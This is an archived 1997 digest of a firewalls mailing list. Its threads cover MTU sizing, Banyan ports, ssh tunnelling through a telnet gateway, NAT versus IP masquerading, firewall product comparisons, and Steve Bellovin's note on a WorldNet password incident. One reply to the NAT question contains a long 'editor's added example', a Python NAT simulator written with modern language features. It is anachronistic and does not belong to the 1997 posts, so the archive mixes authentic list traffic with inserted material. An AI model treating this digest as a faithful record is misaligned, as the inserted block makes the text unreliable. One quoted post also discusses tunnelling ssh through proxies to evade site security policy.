Many years ago I connected offices together via 'secure' FR VPNs (I know better now), and noticed that WAN performance increased if I shrunk the MTU to a multiple of 128 - 768 working best in my situation. I'm guessing this is because of the X.25 parentage of FR (packet size).

Are others adjusting the size of the MTU on the internet side of their firewalls? Because of the presence of FR on the net, is this something all feeds should worry about? Will ATM backbones impact packet size? Am I just imagining this or was this a situational fluke?
Bill Stout
_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)          stoutb@pios.com
Pioneer Standard (Computer Systems & Components)  http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices)   (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*


From: Bill Stackpole
To: "'Mr. Jolt Cola'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: Banyan ports through firewall?
Date: Mon, 2 Jun 1997 15:50:46 -0700

Banyan says port 573 for udp and 83 for tcp. I haven't tried these yet but I will be setting up a firewall shortly so let me know if they work.

Thanks.

"Simplify - There is no value in complexity, it's too difficult to manage."

Bill Stackpole, CISSP
Seitel Leeds & Associates
2 Nickerson St. Suite 201
Seattle, Wa 98109
Voice: 206.283.4355
Email: bstackpole@sla.com

> -----Original Message-----
> From: Mr. Jolt Cola [SMTP:msmith@quix.robins.af.mil]
> Sent: Monday, June 02, 1997 2:07 PM
> To: firewalls@greatcircle.com
> Subject: Banyan ports through firewall?
>
> Could someone tell me what ports Banyan uses to communicate?
> I searched the web and came up with tcp and udp 567 and 573.
> The servers still do not talk through the firewall with these
> ports open.
> Any ideas? I'll probably just go out and do some
> packet sniffing but I was hoping someone here knew.
>
> Thanks,
>
> Melvin Smith


From: "Zot O'Connor"
Reply-To: zot@crl.com
To: Firewalls list
Subject: ssh proxy for tn-gw
Date: Mon, 02 Jun 1997 16:12:44 -0700

Here is info from the README. This requires a host to have tn-gw on the receiving end. Apparently tn-gw uses several characters as codes and tn-nav-gw escapes these for the client, and then unescapes them for the server. This works for me since I go to many clients who have tn-gw up and I cannot control the firewall. Once out to my home, I can ssh to the site I need.

What is it?
-----------

tn-gw-nav is a program to allow you to use SSH (http://www.cs.hut.fi/ssh/) to connect to a host which is on the outside of a TIS fwtk derived telnet gateway. The host on the outside must also be configured to use tn-gw-nav.

Getting the Source
------------------

ftp://ftp.nlc.net.au/pub/unix/tn-gw-nav

Contact the Authors
-------------------

John Saunders
Charlie Brady

How does it work?
-----------------

SSH has a feature which allows you to use a program as a proxy to establish a connection to the SSHD server. One of the functions of tn-gw-nav is to negotiate the connection through the telnet gateway. The other function of tn-gw-nav is to create a clean 8 bit stream between ssh and sshd after the connection is created. The telnet gateway unfortunately treats a few characters as special - these need to be escaped to traverse the gateway safely, then unescaped before being fed to the SSHD server.

Because tn-gw-nav must run at both ends of the connection, it does not directly provide a general solution to using ssh through the telnet gateway. Once you have one ssh connection with a tn-gw-nav equipped host, however, you will then be able to use ssh from there to anywhere else using ssh.

If the unescaping code was added to sshd, enabled on a host by host basis through a config entry in /etc/sshd_config, then tn-gw-nav would only be required at the SSH client end. A patch for SSHD is on the TODO list.
Zot O'Connor From owner-firewalls-outgoing Mon Jun 2 17:15:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA12649 for firewalls-outgoing; Mon, 2 Jun 1997 17:10:18 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA12640 for ; Mon, 2 Jun 1997 17:10:13 -0700 (PDT) Received: from pp (pp.ksc.nasa.gov [128.159.174.102]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id RAA01684 for ; Mon, 2 Jun 1997 17:16:05 -0700 (PDT) Received: from kscgws00.ksc.nasa.gov by pp with SMTP (PP); Mon, 2 Jun 1997 19:15:01 -0400 Received: by kscgws00.ksc.nasa.gov with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC6F89.1C555B90@kscgws00.ksc.nasa.gov>; Mon, 2 Jun 1997 19:13:53 -0400 Message-ID: From: "Ferrell-1, Ema" To: "'firewalls@greatcircle.com'" Subject: Difference between NAT and IP Masquerading Date: Mon, 2 Jun 1997 19:13:48 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All, Could someone explain the difference between Network Address Translation and IP Masquerading. Which is better to use? What firewall products offer which? 
TIA, Ema Ferrell Checkout & Launch Control System Hardware Design Division Support Networks/DE-CLC-A 407-861-xxxx(phone #) 407-861-7470 (fax #)

From owner-firewalls-outgoing Mon Jun 2 17:45:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA16190 for firewalls-outgoing; Mon, 2 Jun 1997 17:34:31 -0700 (PDT) Received: from m2.sprynet.com (m2.sprynet.com [165.121.1.99]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA16089 for ; Mon, 2 Jun 1997 17:34:12 -0700 (PDT) Received: from pcarlson.raptor.com (dd29-254.compuserve.com [199.174.146.254]) by m2.sprynet.com (8.6.12/8.6.12) with SMTP id RAA02531; Mon, 2 Jun 1997 17:38:04 -0700 Message-Id: <3.0.1.32.19970602183756.006891b0@m2.sprynet.com> X-Sender: carlsonp@m2.sprynet.com X-Mailer: Windows Eudora Light Version 3.0.1 (32) Date: Mon, 02 Jun 1997 18:37:56 -0600 To: "Maurizio Fiocchi" , From: Peter Carlson Subject: Re: PIX and Firewall-1 In-Reply-To: <199706021345.MAA09733@otmfire.otm.it> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

There are many comparisons made by datacomm, lan times, ziff-davis and others. Keep in mind that both pix and fw-1 are glorified packet filters, even though they have a fancy name for it. I would stick with an application level gateway. They are well accepted and known for being more secure.

-Peter

At 12:33 PM 6/2/97 +0200, Maurizio Fiocchi wrote:
>I am appraising two firewalls, the first Pix and the second Firewall-1.
> From an attentive analysis I have noticed that the two SW have a notable
>difference regarding the characteristics of administration and of
>performance.
>
>I was wondering whether an analysis or a comparison between the two SW exists, so
>that I could choose without mistake.
>
>Do available documents exist?
>
>Thank you
>

From owner-firewalls-outgoing Mon Jun 2 18:00:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA15557 for firewalls-outgoing; Mon, 2 Jun 1997 17:31:19 -0700 (PDT) Received: from m2.sprynet.com (m2.sprynet.com [165.121.1.99]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id RAA15537 for ; Mon, 2 Jun 1997 17:31:12 -0700 (PDT) Received: from pcarlson.raptor.com (dd29-254.compuserve.com [199.174.146.254]) by m2.sprynet.com (8.6.12/8.6.12) with SMTP id RAA00137; Mon, 2 Jun 1997 17:35:05 -0700 Message-Id: <3.0.1.32.19970602183402.00689ff8@m2.sprynet.com> X-Sender: carlsonp@m2.sprynet.com X-Mailer: Windows Eudora Light Version 3.0.1 (32) Date: Mon, 02 Jun 1997 18:34:02 -0600 To: Bill Stout , firewalls@GreatCircle.COM From: Peter Carlson Subject: Re: NSC Firewall experience? In-Reply-To: <2.2.32.19970530220016.00adbcb8@vaxf.pios.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

A whole bunch of headaches. I used to work for a company that had NSC routers implemented; besides shoddy code, ridiculous support and routers that just didn't function according to the basic theories of routing, they didn't have too bad of a product. ;-)

-Peter

At 03:00 PM 5/30/97 -0700, Bill Stout wrote:
>NSC Firewalls were recommended by a consulting firm for a customer. From
>what I can determine from their website so far, BorderGuard/NetSentry
>products are basically filtering routers, not firewalls. So far I don't see
>a difference between NSC BorderGuard and normal Cisco routers' capability to
>do extended filtering and VPNs.
>
>What am I missing? Comments?
>
>
>_____________________________________________________________________________
>Bill Stout (Systems Engineer/Consultant) stoutb@pios.com
>Pioneer Standard (Computer Systems & Components) http://www.pios.com/
>San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100
>*My opinions do not reflect that of the company, and vice versa, thankfully.*
>

From owner-firewalls-outgoing Mon Jun 2 18:45:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA26220 for firewalls-outgoing; Mon, 2 Jun 1997 18:42:42 -0700 (PDT) Received: from mail.marben.com (losgatos.sjc.marben.com [206.86.34.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id SAA26203 for ; Mon, 2 Jun 1997 18:42:34 -0700 (PDT) Received: (from girsch@localhost) by mail.marben.com (SMI-8.6/SMI-SVR4/MPI-AG(12)) id SAA22532 ; Mon, 2 Jun 1997 18:43:29 -0700 From: girsch@marben.com (Arnaud Girsch) Message-Id: <199706030143.SAA22532@mail.marben.com> Subject: Re: ssh proxy for fwtk To: pnash@hanshan.bbnplanet.com Date: Mon, 2 Jun 1997 18:43:28 -0700 (PDT) Cc: don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@greatcircle.com, ylo@cs.hut.fi In-Reply-To: <19970528182528.5140.qmail@hanshan.bbnplanet.com> from "pnash@hanshan.bbnplanet.com" at May 28, 97 02:25:28 pm X-Organization: Marben Products, Inc. / DSET Corporation X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I think they're looking for something a bit more covert, so that they
> don't have to get their firewall admin to setup a plug.. Tunneling
> always brings up interesting problems when trying to control users.. Does
> anyone know if there are "intelligent" proxies that can detect when the
> proxy connects to a ssh server, or whatever via the various handshaking
> that partakes. Even if it just looks for "SSH-1.5-1.2.20" or somesuch, it
> can alert you to users getting around your policy.
> In my mind, ssh is the easiest way to get around security policies
> provided you have access to a telnet proxy or http proxy..
> Tunnel through
> the proxy to a remote site, and now you have access to X, tunnel whatever
> apps you want, ftp files, etc.. It's all encrypted so the admin would
> never know..

Although you have a valid point that proxies are an open door to get around security policies, I think you have to first think why you have a policy in the first place. Do you restrict the access because you want to restrict your users or because you want to secure your network? For example, you probably restrict X because you think that X is never secure and can be abused, etc ... Giving access to X within a ssh tunnel protects against most of the X problems, so why not give X access then? ftp'ing files is another matter, as the transit is not the only concern in that case.

As an admin ... do you want to know exactly what your users are doing? Sure, you want to know what kind of stuff they're doing, but you don't want to know what's inside the stuff they're doing .... If you can give them access to some resources (X, etc ...) in a secure manner, I don't see any reason why you should not.

Maybe I'm wrong and missed something :-)

Arnaud.

Note: "you" wasn't directed to one person directly :-)

--
Arnaud Girsch -+- Marben Products, Inc.
/ DSET Corporation - San Jose, CA agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/ From owner-firewalls-outgoing Mon Jun 2 23:00:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA09331 for firewalls-outgoing; Mon, 2 Jun 1997 22:57:25 -0700 (PDT) Received: from ren.globecomm.net (ren.globecomm.net [207.51.48.3]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA09324 for ; Mon, 2 Jun 1997 22:57:20 -0700 (PDT) Received: from chiba (syd2-ppp-152.tpgi.com.au [203.29.157.152]) by ren.globecomm.net (8.8.5/8.8.0) with SMTP id CAA08398 for ; Tue, 3 Jun 1997 02:00:46 -0400 (EDT) Date: Mon, 2 Jun 1997 16:01:30 +1000 (EST) From: Warpy To: firewalls@GreatCircle.COM Subject: SSH Equiv for FTP? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was wondering whether there was an equivalent to SSH for ftp. Does anyone know if there is? Warpy From owner-firewalls-outgoing Mon Jun 2 23:30:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA10714 for firewalls-outgoing; Mon, 2 Jun 1997 23:18:57 -0700 (PDT) Received: from sunphil ([208.142.163.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA10697 for ; Mon, 2 Jun 1997 23:18:49 -0700 (PDT) Received: by sunphil (SMI-8.6/SMI-SVR4) id OAA16536; Tue, 3 Jun 1997 14:16:42 -0800 Date: Tue, 3 Jun 1997 14:16:42 -0800 From: drexx@pspi.com.ph (Drexx Laggui) Message-Id: <199706032216.OAA16536@sunphil> To: fw-1-mailinglist@us.checkpoint.com, solid@mozcom.com, firewalls@greatcircle.com Subject: Re: [FW1] Performance monitoring for FW-1 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk |> From: "Jet B. Bagadion" |> |> Hello everybody, |> |> How will I monitor Firewall-1 performance? Please send some tips on how I |> can improve its performance. 
|>

Hello Jet,

1] On Sun H/W:

1.1] On a Sun Solaris platform, the easiest way is to use the Performance Meter (/usr/openwin/bin/perfmeter). Just right-mouse click to get to the Properties menu and select the parameters you'd like to monitor (CPU, RAM, network utilization, etc.)

1.2] On checking the FW-1 host disk activity, do
     prompt# iostat -x 30
Look at the b values (from the whole 30 samples) and average it. If it's more than 35% utilized then it is rather busy. Either stripe it or get a faster disk then.

1.3] For checking network performance, do
     prompt# netstat -i 30
A network output with too many collisions reduces throughput and increases response time. Upgrade to a faster network if necessary.

1.4] On CPU and memory rules, use
     prompt# vmstat 30
If the "swap" values are (1000k <= 10000k) or worse, then the system may soon run out of virtual memory. Try to add more swap.
If the "sr" values are (200 <= 300), then the system is scanning through memory looking for more pages to free at a high rate. This indicates that, as well as inactive pages, active pages may be stolen from processes.
If the "r" values are from (3 <= 5), then there is insufficient CPU power. Jobs are spending an increasing amount of time in the queue before being assigned to a CPU. This reduces throughput and increases response time.

2.0] On the FW-1 application, do
     prompt# fw ctl pstat
If too low, edit the /etc/system file with fw:fwhmem=0x100000 (~1MB RAM).

3.0] Search out Adrian Cockroft's columns on www.sun.som/sunworld for more info.

Until next time,
Drexx.

"It's a dirty job, but somebody's gotta do it." -- John Wayne

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Group /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC.
/_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++ 63-2) 813-6453 to 55 loc. 222 \_____\ \\ Fax : (++ 63-2) 813-5834 \_____\/ Email: drexx@pspi.com.ph Pager: (++ 63-2) 1277-33615 ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ From owner-firewalls-outgoing Tue Jun 3 00:15:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA13725 for firewalls-outgoing; Mon, 2 Jun 1997 23:50:09 -0700 (PDT) Received: from hp00086.ina.de (hp00086.ina.de [159.51.6.8]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA13609 for ; Mon, 2 Jun 1997 23:49:47 -0700 (PDT) Received: from hp00002.koi.ina.de (hp00002.ina.de) by hp00086.ina.de with ESMTP (1.37.109.18/INA-1.0-SER) id AA265690749; Tue, 3 Jun 1997 08:52:30 +0200 Received: from pc00874.ina.de by koi.ina.de with SMTP (1.37.109.24/INA-1.0) id AA191920698; Tue, 3 Jun 1997 08:51:38 +0200 Received: by pc00874.ina.de with Microsoft Mail id <01BC6FFB.76D33980@pc00874.ina.de>; Tue, 3 Jun 1997 08:52:28 +0200 Message-Id: <01BC6FFB.76D33980@pc00874.ina.de> From: Basil McCrea To: "'firewalls@greatcircle.com'" Subject: Netscape and Port IS411-srvr Date: Tue, 3 Jun 1997 08:52:26 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, We have a few NT boxes with Netscape and our firewall logs that they try to access 205.218.156.41 on port 6499 (IS411-srvr). Network 205.218.156 belongs to Netscape. Does anyone know what they are trying to do? 
TIA Basil McCrea From owner-firewalls-outgoing Tue Jun 3 01:00:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA22328 for firewalls-outgoing; Tue, 3 Jun 1997 00:50:43 -0700 (PDT) Received: from mailgw1.almaden.ibm.com (mailgw1.almaden.ibm.com [198.4.83.39]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA22293 for ; Tue, 3 Jun 1997 00:50:30 -0700 (PDT) Received: by mailgw1.almaden.ibm.com(Lotus SMTP MTA v1.1 (385.6 5-6-1997)) id 882564AB.002BBAA2 ; Tue, 3 Jun 1997 00:57:38 -0700 X-Lotus-FromDomain: ALMADEN From: "Tony Rall" To: firewalls@greatcircle.com Message-ID: <882564AB.002AE100.00@mailgw1.almaden.ibm.com> Date: Tue, 3 Jun 1997 00:53:31 -0700 Subject: Re: Difference between NAT and IP Masquerading Mime-Version: 1.0 Content-type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Could someone explain the difference between Network Address Translation >and IP Masquerading. Which is better to use? What firewall products >offer which? NAT supports hiding n internal addresses behind m external addresses, where n is usually less than m. IPMasq is a subset of NAT where n=1. One of these is likely available on a number of products; IBM's Firewall (nee SNG) supports NAT. Tony Rall From owner-firewalls-outgoing Tue Jun 3 01:30:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA21898 for firewalls-outgoing; Tue, 3 Jun 1997 00:47:34 -0700 (PDT) Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA21890 for ; Tue, 3 Jun 1997 00:47:28 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id LAA26531; Tue, 3 Jun 1997 11:50:26 +0400 From: ArkanoiD Message-Id: <199706030750.LAA26531@paranoid.convey.ru> Subject: Re: SSH Equiv for FTP? 
To: warpy@null.net (Warpy) Date: Tue, 3 Jun 1997 11:50:25 +0400 (MSD) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Warpy" at Jun 2, 97 04:01:30 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > > I was wondering whether there was an equivalent to SSH for ftp. Does > anyone know if there is? > You can use ftp over ssh with port forwarding feature.. -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! From owner-firewalls-outgoing Tue Jun 3 04:30:14 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA11675 for firewalls-outgoing; Tue, 3 Jun 1997 04:26:44 -0700 (PDT) Received: from ns.research.att.com (ns.research.att.com [192.20.225.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id EAA11667 for ; Tue, 3 Jun 1997 04:26:29 -0700 (PDT) Received: from research.att.com ([135.205.32.20]) by ns; Tue Jun 3 07:29:02 EDT 1997 Received: from smb.research.att.com ([135.205.55.9]) by research; Tue Jun 3 07:27:35 EDT 1997 Received: from smb.research.att.com (smb@localhost) by smb.research.att.com (8.8.5/8.8.5) with ESMTP id HAA04720 for ; Tue, 3 Jun 1997 07:27:33 -0400 (EDT) Message-Id: <199706031127.HAA04720@smb.research.att.com> From: Steve Bellovin To: firewalls@greatcircle.com Subject: Re: Bungled password management at WorldNet Date: Tue, 03 Jun 1997 07:27:32 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Enclosed below is my note to RISKS on the report of a security problem at AT&T Worldnet. ------- Forwarded Message From: Steve Bellovin To: risks@csl.sri.com Subject: Re: How Secure Is AT&T's WorldNet Security? 
Date: Thu, 29 May 1997 23:04:22 -0400 Sender: smb@smb.research.att.com The story about an eavesdropping incident on AT&T Worldnet is incorrect. In fact, a later story by the same author says as much (see http://www.pcworld.com/news/daily/data/0597/970523154723.html). But there are some lessons to be learned from what happened. The original report noted that certain Web pages do not use encryption. We were already aware of this, and the upgrade was in progress even before this incident. But the report also claimed that as a result of the lack of encryption, a customer was able to observe other accounts and passwords going by. This struck us as more than slightly odd, since the user was coming in from a dial-up modem... I won't bother enumerating all the possibilities we considered and investigated. The ultimate answer was that there was no eavesdropping going on; rather, a network administrator had extracted accounts and passwords for a number of users from a LAN-based file server, and fed these into a simulated network monitor program. And how did these passwords get there? Well, various people used a shared facility -- that is, a network of PCs -- as their platform for connecting to AT&T Worldnet. This exposed their passwords to anyone with suitable access to the file server -- which is what happened. What can we learn from this? The first point, of course, is that the system administrator wins -- always. Nothing short of token-based encryption is even a plausible defense against someone who can read any file, and plant programs to monitor keystrokes. (That latter didn't happen here, to my knowledge.) A corollary is that you can't meaningfully encrypt such files, if the enemy is a knowledgeable administrator. If the key is stored in your programs, it can be extracted; the same skills that are used to defeat copy protection will suffice. 
At most, such encryption is a minor hurdle; more likely, it's security through obscurity, giving the same grade of protection as the lock on a bathroom door.

Could the user supply the key? Part of the answer is "no, see above about keystroke monitors". But there's a more fundamental issue, one that goes to the heart of the real problem.

When we deploy computer systems, we engineer them. That is, we choose among many possible designs, to balance needs against costs. There is no such thing as absolute security, of course; more importantly, there is a price to any security system, and it makes no sense to spend more on security than it can save you.

We're dealing here with a mass market product. J. Random Customer *will*, with a fairly high probability, forget his or her password. The cost of an unrecoverable account is quite high -- we probably lose the customer. But it has to be taken a step further -- it's important to minimize the number of calls to Customer Care. (Customer Care is expensive in the mass market world. There are a fair number of software packages around for which the vendor loses money on any copy that generates even a single call.)

This, then, is the bottom line. The engineers who made certain security choices -- storing account information in the clear -- saved a moderate amount of money, traded against a small diminution in security. The customers who used a shared facility to store these account information files (unknowingly) trusted someone else. The overall complexity of the total system -- the AT&T Worldnet end, the user software, the end users, and their environment, including an untrustworthy administrator -- led to some accounts being compromised. And the one simple palliative cited -- encryption of certain network sessions -- would have done nothing to protect anyone.
--Steve Bellovin ------- End of Forwarded Message From owner-firewalls-outgoing Tue Jun 3 05:15:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA15424 for firewalls-outgoing; Tue, 3 Jun 1997 05:08:38 -0700 (PDT) Received: from portal.east.saic.com (portal.east.saic.com [198.151.13.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA15396 for ; Tue, 3 Jun 1997 05:08:23 -0700 (PDT) Received: from blazer.cist.saic.com ([149.8.156.11]) by portal.east.saic.com via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 3 Jun 1997 12:13:46 UT Received: from obiwan.cist.saic.com (unverified [149.8.156.16]) by blazer.cist.saic.com (EMWAC SMTPRS 0.83) with SMTP id ; Tue, 03 Jun 1997 08:07:33 -0400 Message-ID: From: "Chris Kostick" To: "Ferrell-1, Ema" , "'firewalls@greatcircle.com'" Subject: Re: Difference between NAT and IP Masquerading Date: Tue, 3 Jun 1997 08:03:52 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Could someone explain the difference between Network Address Translation > and IP Masquerading. Which is better to use? What firewall products > offer which? IP Masquerading is a subset of NAT. NAT supports address translation in the scenarios of 1:1, many:1, and many:n. IP masquerading is just many:1. 
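[Editor's added example, not part of Chris's or Tony's replies, and not code from any product named in this thread.] The two answers above agree that masquerading is the many:1 case of NAT; what neither spells out is what the box has to remember to make many:1 work, and why that difference matters for exposure. The toy model below translates constructed packets through a static 1:1 mapping and a many:1 masquerade table side by side: 1:1 only rewrites the address and is reachable from outside on every port, while many:1 must also rewrite the source port (two inside hosts may pick the same one) and keep a per-flow table, which incidentally means unsolicited inbound packets have nowhere to go and are dropped. All addresses are constructed documentation-range values.

```python
"""Toy model of NAT (1:1) vs. IP masquerading (many:1) with connection tracking.

Added example for the thread above; not code from any firewall product.
The addresses are constructed values, not real hosts.
"""
from dataclasses import dataclass, replace as with_fields
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    proto: str       # "tcp" or "udp"
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


FiveTuple = Tuple[str, str, int, str, int]   # proto, src ip, src port, dst ip, dst port


class Nat:
    """Static 1:1 NAT plus many:1 masquerading behind a single external address."""

    def __init__(self, masq_ip: str, port_range: Tuple[int, int] = (61000, 65095)):
        self.masq_ip = masq_ip
        self.static: Dict[str, str] = {}          # internal ip -> external ip
        self.static_rev: Dict[str, str] = {}      # external ip -> internal ip
        self._next_port, self._last_port = port_range
        # Masquerade state, kept in both directions so replies can be mapped back.
        self.masq_out: Dict[FiveTuple, int] = {}
        self.masq_in: Dict[Tuple[str, int], FiveTuple] = {}

    def add_static(self, internal_ip: str, external_ip: str) -> None:
        self.static[internal_ip] = external_ip
        self.static_rev[external_ip] = internal_ip

    def _alloc_port(self) -> int:
        if self._next_port > self._last_port:
            raise RuntimeError("masquerade port pool exhausted")
        port, self._next_port = self._next_port, self._next_port + 1
        return port

    def outbound(self, pkt: Packet) -> Packet:
        """Translate a packet leaving the internal network."""
        if pkt.src_ip in self.static:
            # 1:1 NAT: only the address changes; the source port passes through.
            return with_fields(pkt, src_ip=self.static[pkt.src_ip])
        key: FiveTuple = (pkt.proto, pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        ext_port = self.masq_out.get(key)
        if ext_port is None:
            # many:1: each internal flow gets its own external port, otherwise two
            # inside hosts using the same source port would collide.
            ext_port = self._alloc_port()
            self.masq_out[key] = ext_port
            self.masq_in[(pkt.proto, ext_port)] = key
        return with_fields(pkt, src_ip=self.masq_ip, src_port=ext_port)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Translate a packet arriving from outside; None means it is dropped."""
        if pkt.dst_ip in self.static_rev:
            # 1:1 NAT is bidirectional: the inside host is reachable on every
            # port, so it still needs packet filtering of its own.
            return with_fields(pkt, dst_ip=self.static_rev[pkt.dst_ip])
        if pkt.dst_ip == self.masq_ip:
            flow = self.masq_in.get((pkt.proto, pkt.dst_port))
            # Only a reply from the peer the inside host actually talked to matches.
            if flow and (pkt.src_ip, pkt.src_port) == (flow[3], flow[4]):
                return with_fields(pkt, dst_ip=flow[1], dst_port=flow[2])
        return None


def demo() -> dict:
    """Run the two modes side by side on constructed traffic."""
    nat = Nat("203.0.113.1")
    nat.add_static("10.0.0.5", "203.0.113.5")          # one server on 1:1 NAT
    web = ("198.51.100.7", 80)
    a = nat.outbound(Packet("tcp", "10.0.0.10", 40000, *web))
    b = nat.outbound(Packet("tcp", "10.0.0.11", 40000, *web))   # same source port as a
    reply_a = nat.inbound(Packet("tcp", web[0], web[1], "203.0.113.1", a.src_port))
    stray = nat.inbound(Packet("tcp", "198.51.100.9", 4444, "203.0.113.1", a.src_port))
    probe = nat.inbound(Packet("tcp", "198.51.100.9", 4444, "203.0.113.5", 22))
    return {"a": a, "b": b, "reply_a": reply_a, "stray": stray, "probe": probe}


if __name__ == "__main__":
    for name, pkt in demo().items():
        print(f"{name:8} {pkt}")
```

Running demo() shows both inside hosts leaving as 203.0.113.1 on distinct ports, the web server's reply finding its way back to 10.0.0.10:40000, a packet to the same external port from a different peer being dropped, and the 1:1 mapped host accepting an unsolicited connection on port 22. That last line is the practical difference between the two modes when choosing what to put behind which.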
-- Chris

From owner-firewalls-outgoing Tue Jun 3 05:45:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA18160 for firewalls-outgoing; Tue, 3 Jun 1997 05:39:35 -0700 (PDT) Received: from vax01.newman.com (newman.com [152.160.11.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA18145 for ; Tue, 3 Jun 1997 05:39:29 -0700 (PDT) Received: by vax01.newman.com (UCX V2.0-15) Tue, 3 Jun 1997 08:43:50 -0400 Received: by bass.unifiedtech.com (SMI-8.6/SMI-SVR4) id IAA15729; Tue, 3 Jun 1997 08:40:53 -0400 Date: Tue, 3 Jun 1997 08:40:53 -0400 From: jonesmd@newman (Mike Jones) Message-Id: <199706031240.IAA15729@bass.unifiedtech.com> To: mfiocchi@otm.it, firewalls@GreatCircle.COM, carlsonp@sprynet.com Subject: Re: PIX and Firewall-1 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Content-MD5: 8NWlASTDmSIsoadQIzZk4A== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Peter Carlson writes....

> There are many comparisons made by datacomm, lan times, ziff-davis and
> others. Keep in mind that both pix and fw-1 are glorified packet filters,
> even though they have a fancy name for it. I would stick with an
> application level gateway. They are well accepted and known for being more
> secure.

